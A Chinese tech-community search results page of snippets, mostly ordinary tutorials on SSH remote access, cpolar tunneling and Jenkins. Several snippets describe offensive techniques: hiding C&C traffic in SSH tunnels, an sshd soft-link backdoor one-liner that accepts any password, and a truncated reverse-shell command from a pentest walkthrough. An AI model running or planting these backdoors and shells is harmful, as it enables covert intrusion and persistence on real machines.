首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Ubuntu Server 第七章 远程管理

关于SSH,不仅仅做用为链接,还可以做更多,前面的CS搭配Metasploit一章中也使用到了SSH隧道相关知识。远程连接也不仅只有SSH一种远程连接方式。...使用Telnet可以进行简单端口探测,例如: telnet smtp.163.com25,链接成功则代表相关服务开启。...wuhash.com,这条命令将bash命令通过SSH输入给服务端sehll执行后,输出结果返回到本地终端。...#如果想多个用户的话,推荐新建多个用户,使用"su user"切换到新建用户主目录下编辑配置文件,启动实例 #虽然VNC本身有加密机制,不推荐长期开启,可以通过前面的SSH隧道来提升安全性 PUPPET...——珂儿吖 架设你有100台服务器需要部署同样服务,这里还没有介绍脚本,即使你有脚本,不可能手动依次运行下去。这里PUPPET不进行深入,了解即可。

1.9K20

无需公网IP,在家SSH远程连接公司内网服务器「cpolar内网穿透」

本次教程我们来实现如何在外公网环境下,SSH远程连接家里/公司Linux CentOS服务器,无需公网IP,也不需要设置路由器。...安装cpolar后,会默认生成一个ssh名称隧道,如果有ssh,则可以直接跳到查看在线隧道列表,然后远程连接 如果没有,我们点击左侧仪表盘隧道管理——创建隧道,由于ssh连接默认是22端口,因此我们要来创建一条...随机地址公网远程连接 在外我们可以通过这个公网地址来SSH远程连接Linux CentOS,以windows系统为例,我们使用在cmd窗口即可远程连接centOS ssh -p 端口号 用户名@公网地址...首先要登录cpolar官网,点击左侧预留 在预留界面中,找到保留TCP地址项目。在这个项目下,我们填入一些必要信息,识别数据隧道隧道名称、隧道使用区域等。...综上,成功实现了在外公网环境下也可以SSH远程连接到公司/家里Linux CentOS服务器,不需要公网IP,也不用设置路由器,简单通过cpolar内网穿透工具映射本地22端口,通过所生成公网地址来进行

3K30
您找到你想要的搜索结果了吗?
是的
没有找到

不同环境下 Jenkins 调用 shell 脚本管理 docker 容器

一、生产环境 Jenkins 使用 ssh-copy-id 实现 SSH 无密码登录,实现方式如下: ssh-keygen 产生公钥与私钥对. ssh-copy-id 将本机公钥复制远程机器 authorized_keys...文件中,ssh-copy-id 也能让你有远程机器 home, ~..../ssh , 和 ~/.ssh/authorized_keys 权利 第一步:在本地机器使用 ssh-keygen 产生公钥私钥对 $ ssh-keygen 第二步:用 ssh-copy-id 将公钥复制远程机器中...9、创建目标主机持久化连接 ssh -MNf @ 在后台创建目标主机持久化连接,将这个命令和你~/.ssh/config中配置结合使用: Host host ControlPath...10、通过SSH连接屏幕 ssh -t remote_host screen –r 直接连接到远程屏幕会话(节省了无用bash进程)。

1.5K20

利用SSH隧道加密、隐蔽C&C通信流量

本文想通过标准SSH端口转发建立SSH形式加密隧道,用于加密、隐蔽传输恶意流量,从而避免通过流量检测发现恶意行为。复现实验部分以C&C通信流量为例进入实验。...SSH隧道实现主要使用SSH参数配置进行端 口转发,即将所需传输数据内容通过加密SSH隧道进行转发。...注:使用putty、winscp等工具时需要先使用对应平台工具进行rsa私钥导入后转化为相对应文件格式,本次实验使用putty工具导入生成私钥文件sshrsa.ppk。...6) 通过interact命令则可以使用以建立控制信道控制受控主机,通过简单ls命令测试成功如下图: ?...(2) 使用工具(Empire、Metasploit等)构建C&C。 (3) 利用SSH端口转发搭建SSH隧道。 (4) 配置C&C和SSH参数使二者配合实现加密、隐藏恶意流量目的。

1.9K10

Windows系统安装OpenSSH结合VS Code远程ssh连接Ubuntu【内网穿透】

而vscode可以很好解决这些问题,它核心组件都运行在远程环境中,本地开发机器完全不需要拥有远程开发环境源代码,在vscode上编写代码可以直接同步更新到服务器上,给你带来丝滑般远程开发体验。...局域网测试连接远程服务器 以ssh连接ubuntu为例,打开vscode后,先尝试使用局域网地址ssh远程ubuntu 输入命令对话框中,并回车 ssh username@ip 选择一个配置文件 输入完成在右侧会显示出来刚刚添加...8080端口,HTTP协议 4.2 创建隧道映射 我们可以直接使用样例隧道ssh,或者重新创建一个隧道使用tcp协议,指向22端口。...——在线隧道列表,可以看到,刚刚创建隧道已经有生成了相应公网地址,将其复制下来 4.3 测试公网远程连接 在windows上打开vscode,使用所复制公网地址来远程SSH。...点击左侧隧道管理——隧道列表,找到ssh隧道,点击右侧编辑,我们来修改隧道信息,将固定tcp端口地址配置隧道中 修改隧道信息,将保留成功固定tcp地址配置隧道中 端口类型:修改为固定tcp端口

18510

【vscode远程开发】使用SSH远程连接服务器 「内网穿透」

… 而vscode可以很好解决这些问题,它核心组件都运行在远程环境中,本地开发机器完全不需要拥有远程开发环境源代码,在vscode上编写代码可以直接同步更新到服务器上,给你带来丝滑般远程开发体验...局域网测试连接远程服务器 以ssh连接ubuntu为例,打开vscode后,先尝试使用局域网地址ssh远程ubuntu 输入命令对话框中,并回车 ssh username@ip 选择一个配置文件...8080端口,HTTP协议 4.2 创建隧道映射 我们可以直接使用样例隧道ssh,或者重新创建一个隧道使用tcp协议,指向22端口。...——在线隧道列表,可以看到,刚刚创建隧道已经有生成了相应公网地址,将其复制下来 4.3 测试公网远程连接 在windows上打开vscode,使用所复制公网地址来远程SSH。...点击左侧隧道管理——隧道列表,找到ssh隧道,点击右侧编辑,我们来修改隧道信息,将固定tcp端口地址配置隧道中 修改隧道信息,将保留成功固定tcp地址配置隧道中 端口类型:修改为固定tcp端口

1.3K91

高颜值外观Archcraft OS如何实现公网环境SSH远程连接【内网穿透】

Cpolar是一种安全内网穿透云服务,可以将内网下本地服务器通过安全隧道暴露至公网,使得公网用户可以正常访问内网服务,是一款内网穿透软件。...下面介绍如何在Archcraft中 安装Cpolar 内网穿透工具,并以实现ssh 远程连接Archcraft 例子来说明使用Cpolar内网穿透好处及优势!...TCP端口(首次使用选择随机地址测试) 地区:选择China 点击创建 然后打开左侧在线隧道列表,查看刚刚创建隧道后生成 ssh TCP连接地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接 上面在cpolar中创建ssh 公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行进行连接测试,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来 再次打开cpolar web ui管理界面,点击左侧仪表盘隧道管理——隧道列表,找到我们上面创建TCP隧道,点击右侧编辑 修改隧道信息,将保留成功固定tcp地址配置隧道中 端口类型

5810

Archcraft系统安装cpolar内网穿透实现公网环境SSH远程连接

下面介绍如何在Archcraft中 安装Cpolar 内网穿透工具,并以实现ssh 远程连接Archcraft 例子来说明使用Cpolar内网穿透好处及优势!...Archcraft安装Cpolar Archcraft是一个基于Arch LinuxLinux发行版,可以使用cpolar Linux 安装方式一键快捷安装,终端命令界面,我们输入下面指令,首次使用...TCP端口(首次使用选择随机地址测试) 地区:选择China 点击创建 然后打开左侧在线隧道列表,查看刚刚创建隧道后生成 ssh TCP连接地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接 上面在cpolar中创建ssh 公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行进行连接测试,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来 再次打开cpolar web ui管理界面,点击左侧仪表盘隧道管理——隧道列表,找到我们上面创建TCP隧道,点击右侧编辑 修改隧道信息,将保留成功固定tcp地址配置隧道中 端口类型

9910

何在openKlyin中设置ssh并结合cpolar内网穿透实现远程连接

开发系统,同样支持ssh 连接,下面我们介绍如何在openKlyin中设置ssh连接,并结合cpolar内网穿透 工具实现远程也可以ssh 连接openKlyin....然后我们通过windwos cmd命令窗口创建进行连接测试,在cmd出入ssh 连接命令,可以看到,连接成功,局域网测试通过了,下面我们安装cpolar工具,实现远程访问操作 3. openKylin安装...TCP端口 (首次使用 选择随机地址测试) 地区:选择China vip 点击创建 然后打开左侧在线隧道列表,查看刚刚创建隧道后生成 ssh TCP连接地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接 上面在cpolar中创建ssh 公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来 再次打开cpolar web ui管理界面,点击左侧仪表盘隧道管理——隧道列表,找到我们上面创建TCP隧道,点击右侧编辑 修改隧道信息,将保留成功固定tcp地址配置隧道中 端口类型

14110

Linux下常见权限维持方式

进入/root/.ssh/文件夹,查看文件夹内容,如下所示: ? 其中 id_rsa为私钥,id_rsa.pub为公钥,接下来打开id_rsa.pub,将内容复制服务器。...通过软连接方式,实质上PAM认证是通过软连接文件名 /tmp/su 在/etc/pam.d/目录下寻找对应PAM配置文件(: /etc/pam.d/su),任意密码登陆核心是auth sufficient...在目标服务器上执行一句话后门: ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888 执行完之后,任何一台机器ssh root@IP -p 8888,输入任意密码...a、创建shell脚本,例如在/etc/evil.sh #!...利用方法:安装完成后,使用ssh 用户@IP -P 配置端口,即可远程登录。 连接后截图: ? 排查技巧:查看端口是否异常,RPM check查看命令是否被替换。

2.3K20

openKylin开放麒麟系统安装内网穿透实现任意设备SSH远程连接

本文主要介绍如何在openKlyin系统中设置ssh连接,并结合cpolar内网穿透工具实现远程也可以ssh连接本地局域网内部署openKlyin系统. openKylin是中国首个基于Linux 桌面操作系统开发者平台...然后我们通过windwos cmd命令窗口创建进行连接测试,在cmd出入ssh 连接命令,可以看到,连接成功,局域网测试通过了,下面我们安装cpolar工具,实现远程访问操作 3. openKylin安装...TCP端口 (首次使用 选择随机地址测试) 地区:选择China vip 点击创建 然后打开左侧在线隧道列表,查看刚刚创建隧道后生成 ssh TCP连接地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接 上面在cpolar中创建ssh 公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来 再次打开cpolar web ui管理界面,点击左侧仪表盘隧道管理——隧道列表,找到我们上面创建TCP隧道,点击右侧编辑 修改隧道信息,将保留成功固定tcp地址配置隧道中 端口类型

10810

使用Jenkins通过Publish Over SSH插件远程控制主机执行脚本

配置免密登录  在Jenkins主机上生成一对密钥,公钥发送给需要被远程主机,私钥配置Jenkins中即可。...注意:私钥指的是Jenkins主机上生成私钥,公钥在上面已经发送给被远程主机了。  Passphrase:SSH密码,使用用户名/密码登录时为用户名密码,使用私钥登录时为私钥密码。  ...Name:SSH节点配置名称,在构建中使用Publish over SSH插件时,此名称将出现在“SSH Server”中“Name”下拉列表中,如下图:  Hostname:通过SSH连接到机器主机名或...创建项目  Name:“系统管理>系统配置”设置SSH Sverver名字Name。  Source files:允许为空,复制远程主机上文件。  ...Remote directory:允许为空,文件得到到远程机上目录,此目录是相对于“SSH Server”中“Remote directory”,如果不存在将会自动创建

1.3K20

攻击本地主机漏洞(下)

通过使用远程访问工具,OpenSSH、RDP、FTP或虚拟网络计算(VNC),可以实现从主机主机数据透视。...SSH远程转发(即,-R SSH命令标志)是一种可用于建立从防火墙主机防火墙外主机反向隧道技术,如图10-20所示。...从attackbox.example.com端口2222/tcp任何连接都将使用SSH反向隧道实际到达防火墙客户端。要通过远程出口点进行SSH,只需指向攻击中SSH命令。...示例: ssh localhost -p 2222 选项: -p用于隧道回内部SSH客户端远程出口端口 提示:如果要启用应用程序从服务器SSH客户端X11转发,可以使用-X选项。...通过身份验证后,您可以浏览http://www.internal.Web.org:8080从袭击中。实例org主机,您连接将通过SSH转发隧道(即端口8080/tcp)连接到内部Web服务器。

3.1K10

域渗透——多层内网环境渗透测试(三)

首先在攻击机上创建/root/.sh 目录用于保存我们公钥和私钥 ssh-keygen -t rsa 第一行输入id_rsa,密码设置为空,直接回车 (echo -e "\n\n";cat id_rsa.pub...在提权之前,我们先对系统信息收集一下 深度信息收集 在tmp目录上传信息收集脚本,对机器进行信息收集 反弹shell 反弹到入口机shell bash -c 'exec bash -i &>/dev/.../tmp/hack上了,我们目前思路是,把我们自己生成ssh密钥复制宿主机上进行写入.ssh目录中authorized_keys文件中,写入成功之后就可以使用该密钥进行登陆该机器。...3389 proxychains rdesktop 192.168.93.40 (注:这里kail无法直接连接域控,因为kail无法与kdc进行身份校验,所以只能通过域控中机器进行远程过去) 上去之后把...mimikatz先给第三层网络windows7中,然后再拖入dc机器中,远程连接DC机器 然后再192.168.93.40机器远程控制域控机器 权限维持---白银票据 我们上了域控之后,先手保存域控

28910

快速学习Git-远程仓库

添加远程库 现在我们已经在本地创建了一个Git仓库,又想让其他人来协作开发,此时就可以把本地仓库同步远程仓库,同时还增加了本地仓库一个备份。...ssh密钥生成 在windows下我们可以使用 Git Bash.exe来生成密钥,可以通过开始菜单或者右键菜单打开Git Bash ? ?...同步远程仓库 同步远程仓库可以使用git bash也可以使用tortoiseGit 使用git bash 在仓库所在目录(D:\temp\git\repository)点击右键选择“Git Bash...从远程仓库克隆 克隆远程仓库也就是从远程把仓库复制一份本地,克隆后会创建一个新本地仓库。选择一个任意部署仓库目录,然后克隆远程仓库。...搭建Git服务器需要准备一台运行Linux机器,在此我们使用CentOS。

1.3K20

【Linux内网穿透】使用SFTP工具快速实现内网穿透

以下是内网穿透一些应用: 远程控制:通过内网穿透技术,可以实现对内网电脑远程控制,比如远程桌面、远程命令行等。...,然后远程连接 如果没有,我们点击左侧仪表盘隧道管理——创建隧道,由于ssh连接默认是22端口,因此我们要来创建一条tcp隧道,指向22端口: 隧道名称:可自定义,注意不要重复 协议:tcp 本地地址...:22 域名类型:选择随机域名 地区:选择China VIP Top 点击创建 创建好后打开在线隧道列表,查看随机公网tcp地址 4.远程访问 然后我们继续使用在winSCP ,输入上面创建ssh...在这个项目下,我们填入一些必要信息,识别数据隧道隧道名称、隧道使用区域等。 在这些信息填入后,点击右侧“保留”按钮,将cpolar官网后台隧道固定下来。...然后再次查看在线隧道列表,发现ssh隧道对应公网地址变成了我们官网保留固定地址 固定地址后,我们再次使用我们固定tcp地址FTP连接.

5.8K50

批量管理自动化运维100台小规模服务器

更新备上百台服务器上ssh公钥、备份上百台服务器上/etc/passwd配置文件等等,通常情况下采用专用自动化运维工具assibe,若因资源或技术因素没有安装此类服务,此时可以通过脚本实现小规模服务器集群自动化运维...二、脚本制作技术需求 2.1 SSH免密码登陆认证 服务器远程管理认证通常有两种方式认证, 第一种采用对称加密算法账号密码登录认证,对称加密即加密和解密使用同一个密钥,最常见算法有...第二种采用非对称加密算法,利用密钥完成认证,非对称加密算法通常有RSA、DSA,其主要作用是生成公钥和私钥,公钥加密数据只能私钥解密,私钥加密数据只能是公钥解密(数字签名),通过私钥能算出公钥,但通过公钥无法推算出私钥...,具体原理见如下: ssh-keygen命令用来生成公钥和私钥密钥对工具,通常用法如下 命令选项含义ssh-keygen-t指定创建密钥对加密算法,默认为rsa-p输入旧密码,在新建密钥对时不加此选项...,高效复制文件,需要注意是:使用pssh命令时,命令参数中不支持变量($HOSTNAME)和通配符(*)等,如果命令参数中有变量和通配符时,pssh会人为是执行本地命令,而非远程主机命令。

5.2K150

使用 ssh 端口转发实现登陆内网主机

参数介绍 反向代理 ssh -fCNR 正向代理 ssh -fCNL -f 后台执行ssh指令 -C 允许压缩数据 -N 不执行远程指令 -R 将远程主机(服务器)某个端口转发到本地端指定机器指定端口...-L 将本地机(客户机)某个端口转发到远端指定机器指定端口 -p 指定远程主机端口 设置步骤 B上设置反向代理 建立A机器B机器反向代理,具体指令为 ssh -fCNR [A机器IP或省略]...免密码登陆 在内网机器B上操作 ssh每次重连都需要键入密码,故在此首先设置免密码登陆内网 生成公钥私钥 默认生成位置为当前用户目录下.ssh/id_rsa.pub ssh-keygen 将key...写到远程机器 ssh-copy-id 机器A用户名@机器AIP 按照之前我设定端口,这个指令就是如下 ssh-copy-id -i .ssh/id_rsa.pub roota@192.168.0.2...那以后这台内网B机器ssh登陆外网A机器就可以免密码登陆啦~ 检验是否已经可以使用免密码登陆可以使用如下指令来检验: ssh roota@192.168.0.2 用autossh建立稳定隧道 在内网机器

2.9K30
领券